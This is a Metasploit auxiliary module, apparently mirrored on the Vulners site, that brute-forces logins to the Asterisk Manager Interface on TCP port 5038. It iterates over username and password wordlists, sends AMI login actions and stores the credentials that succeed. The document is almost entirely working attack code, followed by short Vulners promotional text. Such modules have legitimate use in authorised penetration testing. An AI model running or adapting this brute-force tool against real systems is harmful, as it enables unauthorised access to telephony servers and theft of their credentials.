##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
def initialize(info={})
super(update_info(info,
'Name' => 'Asterisk Manager Login Utility',
'Description' => %q{
This module attempts to authenticate to an Asterisk Manager service. Please note
that by default, Asterisk Call Management (port 5038) only listens locally, but
this can be manually configured in file /etc/asterisk/manager.conf by the admin
on the victim machine.
},
'Author' =>
[
'dflah_ <dflah[at]alligatorteam.org>',
],
'References' =>
[
['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(5038),
OptString.new('USER_FILE',
[
false,
'The file that contains a list of probable users accounts.',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')
]),
OptString.new('PASS_FILE',
[
false,
'The file that contains a list of probable passwords.',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
])
])
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'asterisk_manager',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def run_host(ip)
print_status("Initializing module...")
begin
each_user_pass do |user, pass|
do_login(user, pass)
end
rescue ::Rex::ConnectionError
rescue ::Exception => e
vprint_error("#{rhost}:#{rport} #{e.to_s} #{e.backtrace}")
end
end
def send_manager(command='')
begin
@result = ''
if (!@connected)
connect
@connected = true
select(nil,nil,nil,0.4)
end
sock.put(command)
@result = sock.get_once || ''
rescue ::Exception => err
print_error("Error: #{err.to_s}")
end
end
def do_login(user='',pass='')
@connected = false
begin
send_manager(nil) # connect Only
if @result !~ /^Asterisk Call Manager(.*)/
print_error("Asterisk Manager does not appear to be running")
return :abort
else
vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
send_manager(cmd)
if /Response: Success/.match(@result)
print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
disconnect
return :next_user
else
disconnect
return :fail
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation